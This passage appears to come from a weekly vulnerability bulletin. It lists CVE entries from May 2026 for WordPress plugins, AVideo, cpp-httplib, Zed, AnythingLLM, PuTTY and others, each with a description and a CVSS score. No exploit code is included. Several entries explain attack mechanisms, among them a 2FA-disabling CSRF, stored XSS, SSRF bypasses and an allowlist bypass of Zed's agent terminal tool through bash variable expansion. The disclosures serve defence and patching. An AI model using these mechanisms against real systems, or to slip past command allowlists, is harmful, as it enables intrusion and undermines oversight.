| wpeverest--Everest Forms Contact Form, Payment Form, Quiz, Survey & Custom Form Builder | The Everest Forms - Contact Form, Payment Form, Quiz, Survey & Custom Form Builder plugin for WordPress is vulnerable to unauthorized email sending due to a missing capability check on the send_test_email() function in all versions up to, and including, 3.4.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to send test emails to arbitrary addresses from the server. | 2026-05-27 | 4.3 | CVE-2026-4888 |
| wpeverest--User Registration & Membership Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder | The User Registration & Membership - Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.1.5. This is due to missing ownership validation on a user-controlled attachment ID, allowing the plugin to store and subsequently delete arbitrary media attachments without verifying that the referenced attachment belongs to the requesting user. This makes it possible for authenticated attackers, with subscriber-level access and above, to permanently delete arbitrary media attachments uploaded by any other user, including administrators. | 2026-05-28 | 5.3 | CVE-2026-7651 |
| Wpmet--ElementsKit Elementor addons Lite | Missing Authorization vulnerability in Wpmet ElementsKit Elementor addons Lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ElementsKit Elementor addons Lite: from n/a through 3.9.6. | 2026-05-27 | 5.3 | CVE-2026-49053 |
| Wpmet--ElementsKit Elementor addons Lite | Missing Authorization vulnerability in Wpmet ElementsKit Elementor addons Lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ElementsKit Elementor addons Lite: from n/a through 3.9.6. | 2026-05-27 | 4.3 | CVE-2026-49052 |
| WPPOOL--FlexTable | Missing Authorization vulnerability in WPPOOL FlexTable allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects FlexTable: from n/a through 3.24.0. | 2026-05-25 | 4.3 | CVE-2026-24582 |
| WPXpro--Xpro Elementor Addons - Pro | The Xpro Elementor Addons - Pro plugin for WordPress is vulnerable to Arbitrary File Reading in all versions up to, and including, 1.4.7 via the Draw SVG widget. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2026-05-27 | 6.5 | CVE-2025-0898 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, EpgParser.php, plugin/AI/receiveAsync.json.php, and other locations do not use the $resolvedIP out-param of isSSRFSafeURL() for DNS pinning via CURLOPT_RESOLVE, opening DNS-rebinding TOCTOU. | 2026-05-29 | 6.5 | CVE-2026-45619 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, there is a stored cross-site scripting vulnerability. The Live plugin's "YouTube-style" view renders the live transmission's stream key into an HTML class attribute by raw echo, without htmlspecialchars(). A canStream user can persist a key containing " plus an event handler via plugin/Live/saveLive.php, and any visitor (logged in or anonymous) opening the stream's live page executes attacker JavaScript in the platform origin. | 2026-05-29 | 5.4 | CVE-2026-45580 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, there is a cross-site request forgery vulnerability on the 2FA toggle. plugin/LoginControl/set.json.php accepts POST type=set2FA value=false, calls LoginControl::setUser2FA(User::getId(), false) on the session-authenticated user, and returns. There is no forbidIfIsUntrustedRequest() call, no isTokenValid() check, no X-CSRF-Token/SameSite enforcement, and no re-authentication step. A cross-origin page that the victim visits while logged into the AVideo dashboard issues the POST via a hidden form (or fetch without credentials:"omit") and disables the victim's 2FA in one request. | 2026-05-29 | 5.7 | CVE-2026-45610 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, objects/mention.json.php has no User::loginCheck() or admin gate. It only has an entry guard: preg_match('/^@/', $_REQUEST['term']) and hard-coded rowCount=10. This enables unauthenticated user enumeration. | 2026-05-29 | 5.3 | CVE-2026-45620 |
| WWBN--AVideo | WWBN AVideo is an open source video platform. In 29.0 and earlier, AVideo stores category descriptions from user input and later renders category_description as raw HTML in the Gallery view. A user who can create or edit categories can store JavaScript in a category description, which executes when another user views the affected Gallery/category page. This is a stored XSS in the category description field, separate from previously fixed XSS issues in video titles or comments. | 2026-05-29 | 5.4 | CVE-2026-47694 |
| xianrendzw--EasyReport | A flaw has been found in xianrendzw EasyReport up to 2.0.17.0522_Beta. Affected by this issue is the function execute of the component REST Endpoint. Executing a manipulation of the argument reportParams can lead to sql injection. The attack can be launched remotely. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 6.3 | CVE-2026-9524 |
| XX-net--XX-Net | XX-Net V5.16.6 contains a WebSocket frame parsing vulnerability in the WebSocket_receive_worker routine of simple_http_server.py that allows attackers to cause corrupted application data by sending unmasked WebSocket frames. The server unconditionally reads 4 bytes as a masking key regardless of whether the MASK bit is set in the frame header, causing the first 4 bytes of payload to be consumed as a mask key and the remaining payload to be incorrectly XOR-decoded, resulting in data corruption alongside missing RSV bit, opcode, and FIN fragmentation validations. | 2026-05-29 | 4 | CVE-2026-10099 |
| xyproto--algernon | Algernon is a small self-contained pure-Go web server. Prior to 1.17.7, the SSE event server bound to 0.0.0.0:5553 on Linux/macOS by default because the platform-dependent host default in engine/flags.go:39-46 set host = "" for non-Windows, and utils.JoinHostPort("", ":5553") resolves to ":5553". This vulnerability is fixed in 1.17.7. | 2026-05-26 | 4.3 | CVE-2026-46430 |
| xyproto--algernon | Algernon is a small self-contained pure-Go web server. Prior to 1.17.7, the SSE event server's Access-Control-Allow-Origin response header was hardcoded to the wildcard * regardless of the caller's Origin. Because EventSource does not preflight and does not send cookies, the wildcard is sufficient to let any third-party page the developer visits open a cross-origin EventSource to the SSE port and read the live filename stream from JavaScript. This vulnerability is fixed in 1.17.7. | 2026-05-26 | 4.3 | CVE-2026-46431 |
| yashpokharna2555--StudentManagementSystem | A vulnerability was found in yashpokharna2555 StudentManagementSystem cb2f558ddf8d19396de0f92abf2d224d46a0a203. This impacts an unknown function of the file courseDel.php. The manipulation of the argument ID results in improper control of resource identifiers. The attack may be performed from remote. The exploit has been made public and could be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 5.4 | CVE-2026-9438 |
| yehudah--faq shortocde | The faq shortocde plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'color' shortcode attribute in the 'faq' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8040 |
| yhirose--cpp-httplib | cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.43.4, negative chunk-size in chunked Transfer-Encoding causes unbounded memory allocation and process crash. The ChunkedDecoder::read_payload function in cpp-httplib (httplib.h) parses the chunk-size field of HTTP chunked transfer encoding using std::strtoul(). Per the C standard (§7.22.1.4), strtoul silently accepts a leading minus sign, performing unsigned wrap-around: strtoul("-2", …, 16) returns ULONG_MAX − 1 (0xFFFFFFFFFFFFFFFE). The library's only guard (line 12833) rejects ULONG_MAX (the result of "-1"), but any other negative value such as "-2" passes validation. The resulting near-maximum value is stored in chunk_remaining and controls how many bytes the server's read loop consumes from the network. This vulnerability is fixed in 0.43.4. | 2026-05-29 | 5.3 | CVE-2026-45352 |
| yoast--Yoast SEO Advanced SEO with real-time guidance and built-in AI | The Yoast SEO plugin for WordPress is vulnerable to Insecure Direct Object References in all versions up to, and including, 26.5. This is due to insufficient authorization checks in the Meta Search REST API endpoint that fail to verify post ownership. This makes it possible for authenticated attackers, with Contributor-level access and above, to read sensitive SEO metadata from any post on the site via the 'post_id' parameter, including posts owned by other users, private posts, and draft posts. | 2026-05-27 | 4.3 | CVE-2025-14481 |
| youtag--Two-factor authentication (formerly IP Vault) | The Two-factor authentication (formerly IP Vault) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1. This is due to missing or incorrect nonce validation on the ipv_save_changes function. This makes it possible for unauthenticated attackers to modify the plugin's firewall and two-factor authentication settings - including the operating mode, request include/exclude rules, authentication slug, and log retention period - potentially disabling protection entirely via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-8903 |
| YunaiV--yudao-cloud | A vulnerability has been found in YunaiV yudao-cloud 2026.03. This affects the function IotDataSinkHttpConfig of the file /admin-api/iot/data-sink/create of the component Admin API Endpoint. Such manipulation leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 4.7 | CVE-2026-9464 |
| zed-industries--zed | Zed is a code editor. Prior to 0.229.0, Zed's terminal tool permission system can be bypassed via bash variable expansion chaining (${var@P}), allowing arbitrary command execution under an allowlisted command prefix. This vulnerability is fixed in 0.229.0. | 2026-05-28 | 6.4 | CVE-2026-44462 |
| zephyrproject-rtos--Zephyr | The SocketCAN implementation validates the length of a user-provided buffer containing a socketcan_frame object using only a NET_ASSERT statement in zcan_sendto_ctx() before dereferencing it in socketcan_to_can_frame(). In production builds where assertions are disabled, a userspace application that controls the length passed to a sendto syscall can supply an incomplete or truncated frame, causing socketcan_to_can_frame() to dereference fields beyond the end of the buffer. This results in an out-of-bounds read that can cause denial-of-service crashes or, because the parsed frame contents are transmitted on the network, leak adjacent memory. | 2026-05-30 | 6.1 | CVE-2026-5071 |
| Zohocorp--Zoho Mail wordpress plugin | Zohocorp Zoho Mail wordpress plugin is vulnerable to Cross-Site request forgery (CSRF). This issue affects Zoho Mail wordpress plugin versions before 1.6.2. | 2026-05-26 | 5.7 | CVE-2026-8174 |
| ZTE--ZXUniPOS NDS-LTE | Attackers carefully craft malicious scripts, such as JavaScript, and inject them into target systems; when other users access pages containing such malicious content, the scripts are automatically loaded and executed in the victim's browser.Attackers can thereby steal user cookies, hijack session privileges, and tamper with page content.Since the malicious code is stored within the system, the attack scope is broad and the concealment is strong, making it frequently employed for data theft attacks. | 2026-05-27 | 5.7 | CVE-2026-48999 |
| ZTE--ZXUniPOS NDS-LTE | Cross-site request forgery (CSRF) vulnerabilities allow attackers to exploit a user's authenticated session to forge cross-site requests, inducing the execution of unintended operations such as tampering with configuration data. | 2026-05-27 | 5.3 | CVE-2026-49001 |
| Zyxel--GS1200-5v3 firmware | A missing authorization vulnerability in Zyxel GS1200-5v3 firmware versions through 1.00(ACPS.2)C0, GS1200-8v3 firmware versions through 1.00(ACPT.2)C0, GS1200-5HPv3 firmware versions through 1.00(ACPU.2)C0, GS1200-8HPv3 firmware versions through 1.00(ACPV.2)C0, and GS1200-10v3 firmware versions through 1.00(ACPW.2)C0 could allow a LAN-based, unauthenticated attacker to read the system configuration from a log file via a crafted HTTP request. | 2026-05-26 | 6.5 | CVE-2026-4795 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| Assimp--Assimp | A vulnerability was detected in Assimp up to 6.0.4. Affected is the function glTF2Importer::ImportEmbeddedTextures in the library code/AssetLib/glTF2/glTF2Importer.cpp of the component TF File Handler. The manipulation results in null pointer dereference. The attack is only possible with local access. The exploit is now public and may be used. It is advisable to implement a patch to correct this issue. The pull request to fix this issue awaits acceptance. | 2026-05-31 | 3.3 | CVE-2026-10197 |
| Assimp--Assimp | A flaw has been found in Assimp up to 6.0.4. Affected by this vulnerability is the function Assimp::glTFImporter::ImportMeshes of the file glTFImporter.cpp of the component glTFImporter. This manipulation causes null pointer dereference. The attack is restricted to local execution. The exploit has been published and may be used. The project tagged the reported issue as bug. | 2026-05-31 | 3.3 | CVE-2026-10198 |
| Assimp--Assimp | A vulnerability has been found in Assimp up to 6.0.4. Affected by this issue is the function glTF2::LazyDict in the library glTF2Asset.h. Such manipulation of the argument operator[] leads to null pointer dereference. The attack must be carried out locally. The exploit has been disclosed to the public and may be used. The name of the patch is d24b85319bd70c65883a2b96613e07e23fb95981. It is best practice to apply a patch to resolve this issue. | 2026-05-31 | 3.3 | CVE-2026-10199 |
| Assimp--Assimp | A vulnerability was determined in Assimp up to 6.0.4. This vulnerability affects the function FBXExporter::WriteObjects of the file FBXExporter.cpp of the component UV Channel Handler. Executing a manipulation can lead to divide by zero. The attack needs to be launched locally. The exploit has been publicly disclosed and may be utilized. Applying a patch is advised to resolve this issue. The project tagged the reported issue as bug. | 2026-05-31 | 3.3 | CVE-2026-10201 |
| bugsink--bugsink | Bugsink is a self-hosted error tracking tool. Prior to 2.2.0, Bugsink issue event pages accept a direct event identifier from the URL and, in affected versions, look up that event without also requiring it to belong to the issue in the URL. This is a project-boundary authorization issue: a logged-in user with access to one project can view another project's event data through an issue they are allowed to access. The affected views include the stacktrace, details, and breadcrumbs pages for an issue event. This vulnerability is fixed in 2.2.0. | 2026-05-26 | 3.1 | CVE-2026-47715 |
| bugsink--bugsink | Bugsink is a self-hosted error tracking tool. Prior to 2.2.0, In affected versions, the issue list view authorizes access through the project in the URL, but applies the requested bulk action to the submitted issue IDs without also requiring those issues to belong to that project. This vulnerability is fixed in 2.2.0. | 2026-05-26 | 3.1 | CVE-2026-47716 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain SAUCE patches with a possible NULL pointer dereference in the handling of AppArmor notifications. The bug can be triggered by an unprivileged local user. This can lead to a kernel oops. | 2026-05-28 | 3.3 | CVE-2026-47327 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain SAUCE patches which fail to validate invalid sizes of the name field in AppAmor notification responses. The bug can be triggered by an unprivileged local user and could result in handling of crafted responses. | 2026-05-28 | 3.3 | CVE-2026-47329 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 7.17 and 7.0 contain AppArmor SAUCE patches which can, under certain circumstances, use an uninitialized variable in notification handling code. The bug can be triggered by an unprivileged local user and can result in the incorrect caching of AppArmor notification responses. | 2026-05-28 | 3.3 | CVE-2026-47330 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8 contains SAUCE patches with a possible use of an uninitialized variable in AppArmor AF_INET/AF_INET6 socket mediation code. The bug can be triggered by an unprivileged local user and could result in incorrect fine-grained mediation of network sockets. | 2026-05-28 | 3.3 | CVE-2026-47336 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain SAUCE patches with a possible NULL pointer dereference in the handling of AF_INET/AF_INET6 socket mediation. The bug can be triggered by an unprivileged local user. This can lead to a kernel oops. | 2026-05-28 | 3.3 | CVE-2026-47337 |
| ellanetworks--core | Ella Core is a 5G core designed for private networks. Prior to 1.10.0, Ella Core didn't enforce security rules on concurrent running of security procedures defined in TS 33.501 §6.9.5.1 - it could send a NAS Security Mode Command while an N2 handover was still pending (and vice versa). Concurrent Security Mode Command and N2 handover produce a KgNB mismatch between the UE and target gNB, causing the handover to fail. Requires a stalled gNB + re-registration race to trigger. This vulnerability is fixed in 1.10.0. | 2026-05-27 | 3.7 | CVE-2026-44474 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, the AMF in Free5GC does not enforce the concurrent security procedure rules defined in 3GPP TS 33.501 §6.9.5.1. The AMF does not check for ongoing N2 handover procedures before initiating a NAS Security Mode Command, and vice versa. This can lead to mismatches between NAS and AS security contexts in the network and the UE. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 3.7 | CVE-2026-42082 |
| GNU--LibreDWG | A vulnerability was determined in GNU LibreDWG up to 0.14. The impacted element is the function decompress_R2004_section of the file src/decode.c of the component Dwgread Utility. Executing a manipulation can lead to reachable assertion. The attack is restricted to local execution. The exploit has been publicly disclosed and may be utilized. This patch is called e501cb9926c1e9a07a0d1cc997f3e69e9be801c9. A patch should be applied to remediate this issue. | 2026-05-25 | 3.3 | CVE-2026-9501 |
| GNU--LibreDWG | A security flaw has been discovered in GNU LibreDWG up to 0.14. This impacts the function dwg_next_entity of the file src/decode.c of the component DWG File Handler. The manipulation results in null pointer dereference. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. The patch is identified as 8f03865f37f5d4ffd616fef802acc980be54d300. Upgrading the affected component is advised. | 2026-05-25 | 3.3 | CVE-2026-9503 |
| GNU--LibreDWG | A weakness has been identified in GNU LibreDWG up to 0.14. Affected is the function bit_convert_TU of the file programs/dwggrep.c of the component Dwggrep Utility. This manipulation causes out-of-bounds read. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. Patch name: be996bf2178a40e98720f18c2414815d244413db. Applying a patch is the recommended action to fix this issue. | 2026-05-25 | 3.3 | CVE-2026-9504 |
| GNU--LibreDWG | A security flaw has been discovered in GNU LibreDWG up to 0.14. The affected element is the function match_BLOCK_HEADER of the file dwggrep.c of the component Dwggrep Utility. Performing a manipulation results in null pointer dereference. The attack requires a local approach. The exploit has been released to the public and may be used for attacks. | 2026-05-26 | 3.3 | CVE-2026-9529 |
| GNU--LibreDWG | A weakness has been identified in GNU LibreDWG up to 0.14. The impacted element is the function read_2004_compressed_section of the file src/decode.c of the component Dwgbmp Utility. Executing a manipulation can lead to out-of-bounds read. The attack requires local access. The exploit has been made available to the public and could be used for attacks. This patch is called 8f03865f37f5d4ffd616fef802acc980be54d300. It is advisable to implement a patch to correct this issue. | 2026-05-26 | 3.3 | CVE-2026-9530 |
| GPAC--GPAC | A security flaw has been discovered in GPAC up to 2.4.0. Affected is the function MergeFragment of the file src/isomedia/isom_intern.c of the component MP4Box. The manipulation results in null pointer dereference. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The patch is identified as 525bf1af642c30af04e4df5345e6d798c0a4d8a1. It is advisable to implement a patch to correct this issue. | 2026-05-26 | 3.3 | CVE-2026-9567 |
| GPAC--GPAC | A security vulnerability has been detected in GPAC up to 2.4.0. Affected by this issue is the function Media_GetSample of the file src/isomedia/media.c of the component MP4Box. Such manipulation of the argument cat leads to memory leak. The attack can only be performed from a local environment. The exploit has been disclosed publicly and may be used. The name of the patch is e79c5cbe8b3fed27f4854ec229457d30c96206f1. It is best practice to apply a patch to resolve this issue. | 2026-05-26 | 3.3 | CVE-2026-9572 |
| Indian Motorcycle (Polaris Inc.)--Scout Bobber + Tech | Incorrect behavior order in the Infotainment / Digital Round display of the Indian Motorcycle Scout Bobber + Tech 2025 model year allows an adjacent-network attacker to bypass the PIN entry screen. The Infotainment uses presence of Wireless Control Module (WCM) traffic during its boot window as a proxy for whether an immobilizer is fitted; if no WCM messages are observed, it skips the PIN entry screen and shows the normal user interface. An attacker who silences the WCM during the boot window - for example via a separately tracked CAN bus-off technique - can present a fully unlocked Infotainment despite the PIN never being entered. Specific timing and protocol details have been withheld pending vendor remediation. | 2026-05-29 | 2.4 | CVE-2026-49317 |
| Indian Motorcycle (Polaris Inc.)--Scout Bobber + Tech | Incorrect behavior order in the Infotainment / Digital Round display of the Indian Motorcycle Scout Bobber + Tech 2025 model year allows an adjacent-network attacker to bypass the PIN entry screen. The Infotainment uses presence of Wireless Control Module (WCM) traffic during its boot window as a proxy for whether an immobilizer is fitted; if no WCM messages are observed, it skips the PIN entry screen and shows the normal user interface. An attacker who silences the WCM during the boot window - for example via a separately tracked CAN bus-off technique - can present a fully unlocked Infotainment despite the PIN never being entered. Specific timing and protocol details have been withheld pending vendor remediation. | 2026-05-29 | 2.4 | CVE-2026-49318 |
| JetBrains--IntelliJ IDEA | In JetBrains IntelliJ IDEA before 2026.1 xXE in the UI Designer form parser was possible | 2026-05-29 | 3.3 | CVE-2026-49383 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1 open redirect in the SAML plugin was possible | 2026-05-29 | 3.1 | CVE-2026-49380 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2026.1 stored XSS on the SAML login page was possible | 2026-05-29 | 3.4 | CVE-2026-49381 |
| JetBrains--YouTrack | In JetBrains YouTrack before 2026.1.13162 information disclosure was possible on fetchApp requests | 2026-05-29 | 3.4 | CVE-2026-49370 |
| jpadilla--pyjwt | PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient.get_signing_key() forces a fresh HTTP request to the JWKS endpoint for every JWT with an unknown kid value, with no rate limiting. Since kid comes from the unverified token header, an attacker can trigger unlimited outbound requests. The vulnerability surfaces only when a JWKS fetch fails; an attacker can attempt to provoke that with sustained unknown-kid traffic, but the outcome depends on upstream JWKS-endpoint behavior (rate limiting, transient errors) which is beyond the attacker's control. This vulnerability is fixed in 2.13.0. | 2026-05-28 | 3.7 | CVE-2026-48524 |
| magic-wormhole--magic-wormhole | Magic Wormhole makes it possible to get arbitrary-sized files and directories from one computer to another. Prior to 0.24.0, there is a path traversal when a receiver who specifies "--output <dir>" where that output directory currently exists (as a directory). This vulnerability is fixed in 0.24.0. | 2026-05-26 | 3.5 | CVE-2026-42448 |
| Mintplex-Labs--anything-llm | AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to 1.13.0, the AnythingLLM agent filesystem copy tool validates only the top-level source and destination paths. The recursive copy helper then descends into child entries using fs.stat() and copies files with fs.copyFile() without validating each child or rejecting symlinks. Because both APIs follow symlinks, a symlink nested inside an allowed source directory can point outside the allowed filesystem root and cause outside file contents to be copied into an allowed destination as a regular file. This vulnerability is fixed in 1.13.0. | 2026-05-28 | 2 | CVE-2026-45403 |
| Mintplex-Labs--anything-llm | AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to 1.13.0, an approved mobile device token created in single-user mode can survive single-user -> multi-user migration even when the device record has userId = null. In multi-user mode, that stale token is still accepted by the mobile authentication middleware. Because no user is attached to the request, downstream mobile handlers fall back to unscoped data-access branches and return workspaces and workspace content without per-user filtering. This permits a pre-migration mobile token to enumerate a workspace assigned only to another user and retrieve victim-owned thread metadata and chat content in multi-user mode. This vulnerability is fixed in 1.13.0. | 2026-05-28 | 2 | CVE-2026-47713 |
| OpenSC--OpenSC | OpenSC before 0.27.0-rc1, fixed in commit 3f24f0b, contains a stack buffer overflow vulnerability in piv_process_history() in src/libopensc/card-piv.c that allows physically present attackers to trigger memory corruption by presenting a crafted PIV smart card or USB device returning a URL field longer than 118 bytes in the Key History Object ASN.1 response. | 2026-05-29 | 3.8 | CVE-2026-40510 |
| OpenSC--OpenSC | OpenSC before 0.27.0, fixed in commit 0358817, contains a stack and heap buffer overrun vulnerability in the do_key_value() function in src/pkcs15init/profile.c that allows attackers to corrupt memory by supplying a crafted profile configuration file. During pkcs15-init invocation, a key value entry beginning with '=' followed by more than sizeof(keybuf) characters is copied into keybuf via memcpy without a length check, causing both stack and heap buffer overruns. | 2026-05-29 | 3.8 | CVE-2026-40528 |
| OUSL-GROUP-BrinaryBrains--School Student Management System | A vulnerability was detected in OUSL-GROUP-BrinaryBrains School Student Management System up to 1e70e5ad1125b86dca4ee086eb6bb121f17708b6. Affected by this vulnerability is the function ajax_forgot_password of the file application/controllers/Login.php of the component Forgot Password Endpoint. The manipulation of the argument email results in weak password recovery. The attack can be launched remotely. This attack is characterized by high complexity. The exploitation appears to be difficult. The exploit is now public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 3.7 | CVE-2026-10169 |
| PuTTY--PuTTY | PuTTY 0.72 before 0.84 has a double free in RSA KEX. | 2026-05-25 | 3.7 | CVE-2026-48850 |
| PuTTY--PuTTY | PuTTY 0.77 before 0.84 uses a copy of the PuTTY icon as a trust indication for TELNET data but the trust status is not cleared between proxy authentication and the main session. | 2026-05-25 | 3.1 | CVE-2026-48851 |
| PuTTY--PuTTY | PuTTY 0.71 before 0.84 has an assertion failure in ECDSA signature verification. | 2026-05-25 | 3.7 | CVE-2026-48852 |
| QianFox--FoxCMS | A vulnerability was determined in QianFox FoxCMS up to 1.2.6. The impacted element is an unknown function of the file /Tag/edit of the component Administrator Backend. Executing a manipulation can lead to cross site scripting. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-27 | 2.4 | CVE-2026-9608 |
| Red Hat--Red Hat Quay 3 | A flaw was found in the Quay config-tool's GitLab OAuth validator. This vulnerability causes sensitive credentials, specifically client_id and client_secret, to be transmitted as plaintext in URL query parameters during POST requests to the GitLab endpoint. This insecure transmission can lead to the disclosure of these credentials in various system logs, such as server access logs, reverse proxy logs, and other monitoring systems. An attacker with access to these logs could potentially obtain these credentials, leading to unauthorized information disclosure. | 2026-05-29 | 2.7 | CVE-2026-10078 |
| rizinorg--rizin | Rizin is a UNIX-like reverse engineering framework and command-line toolset. There is a double free in librz/core/cmd/cmd_search.c:byte_pattern_search() due wrong pointer ownership declared. This vulnerability is fixed by commit 045fff363b42b8a6dda8ad5229c29ec3267e7dbe. | 2026-05-29 | 3.3 | CVE-2026-45324 |
| rizinorg--rizin | Rizin is a UNIX-like reverse engineering framework and command-line toolset. There is a heap-buffer-overflow in librz/bin/format/omf/omf.c. This vulnerability is fixed by commit e6d0937c8a083e23ed76ccfb9f631cdc50c7af47. | 2026-05-29 | 3.3 | CVE-2026-45613 |
| Roundcube--Webmail | Roundcube Webmail 1.6.x before 1.6.16, and 1.7.x before 1.7.1 allows pre-authentication arbitrary file deletion via redis/memcache session poisoning bypass. | 2026-05-25 | 3.7 | CVE-2026-48847 |
| sambitraj--STUDENT-MANAGEMENT-SYSTEM | A vulnerability has been found in sambitraj STUDENT-MANAGEMENT-SYSTEM 1.0. Affected is an unknown function of the component Dashboard Page. The manipulation of the argument Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-30 | 2.4 | CVE-2026-10112 |
| SourceCodester--Hospitals Patient Records Management System | A vulnerability was found in SourceCodester/oretnom23 Hospitals Patient Records Management System 1.0. The impacted element is an unknown function of the file /admin/?page=patients/view_patient. Performing a manipulation of the argument Remarks results in cross site scripting. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2026-05-26 | 2.4 | CVE-2026-9564 |
| SourceCodester--Indian Invoicing System | A security flaw has been discovered in SourceCodester Indian Invoicing System up to 0.x/1.0. The impacted element is an unknown function of the file /Invoicing/add_order.php of the component Invoice Template Render Database-Backed. The manipulation of the argument customer_name results in cross site scripting. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-25 | 3.5 | CVE-2026-9414 |
| SourceCodester--Student Grades Management System | A vulnerability was identified in SourceCodester Student Grades Management System 1.0. Affected by this issue is some unknown functionality of the file students.php. The manipulation of the argument Remarks leads to cross site scripting. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2026-05-25 | 3.5 | CVE-2026-9485 |
| Synology--Surveillance Station | Improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in Archiving Pull functionality in Synology Surveillance Station before 9.2.2-11575 and 9.2.2-9575 allows remote authenticated users with administrator privileges to limited file write via unspecified vectors. | 2026-05-27 | 2.7 | CVE-2024-47267 |
| Synology--Surveillance Station | Improper preservation of permissions vulnerability in Archiving Push functionality in Synology Surveillance Station before 9.2.2-11575 and 9.2.2-9575 allows remote authenticated users with administrator privileges to limited file write via unspecified vectors. | 2026-05-27 | 2.7 | CVE-2024-47270 |
| Synology--Surveillance Station | Incorrect authorization vulnerability in IO Module functionality in Synology Surveillance Station before 9.2.2-11575 and 9.2.2-9575 allows remote authenticated users with administrator privileges to limited file write via unspecified vectors. | 2026-05-27 | 2.7 | CVE-2024-47272 |
| yashpokharna2555--StudentManagementSystem | A vulnerability was detected in yashpokharna2555 StudentManagementSystem cb2f558ddf8d19396de0f92abf2d224d46a0a203. This impacts an unknown function of the file /student.php. Performing a manipulation of the argument FIRST_NAME results in cross site scripting. The attack can be initiated remotely. The exploit is now public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 3.5 | CVE-2026-9471 |
| ZTE--ZXUniPOS NDS-LTE | This vulnerability stems from a business logic flaw.Attackers can exploit legitimate application functions in unintended and abnormal ways, deviating from the designer's expectations, to carry out malicious attacks. | 2026-05-26 | 3.8 | CVE-2026-44410 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. Prior to 2.8.1, MaxKB v2.8.0 and prior are vulnerable to a server-side request forgery (SSRF) bypass in the OSS file service URL fetch (chat/api/oss/get_url) endpoint. The vulnerability exists due to inconsistent URL parsing between the urlparse validation function and the requests HTTP client, allowing attackers to access internal network services. This vulnerability is fixed in 2.8.1. | 2026-05-26 | not yet calculated | CVE-2026-42335 | https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-r8hf-mwwr-hxgc |
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. MaxKB 2.8.0 and prior are vulnerable to a server-side request forgery (SSRF) bypass in the OSS file service URL fetch functionality due to inconsistent DNS resolution between validation and actual request execution, allowing attackers to access internal network services. This vulnerability is fixed in 2.8.1. | 2026-05-26 | not yet calculated | CVE-2026-42336 | https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-6m4p-9wwc-4q5q |
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. MaxKB 2.8.0 and prior are vulnerable to a broken access control vulnerability in the OSS file service URL fetch API (chat/api/oss/get_url). The endpoint uses application_id from the URL path without validating ownership, allowing attackers to perform operations under other applications' policies. This vulnerability is fixed in 2.8.1. | 2026-05-26 | not yet calculated | CVE-2026-42337 | https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-2jmj-gwvg-3gp2 |
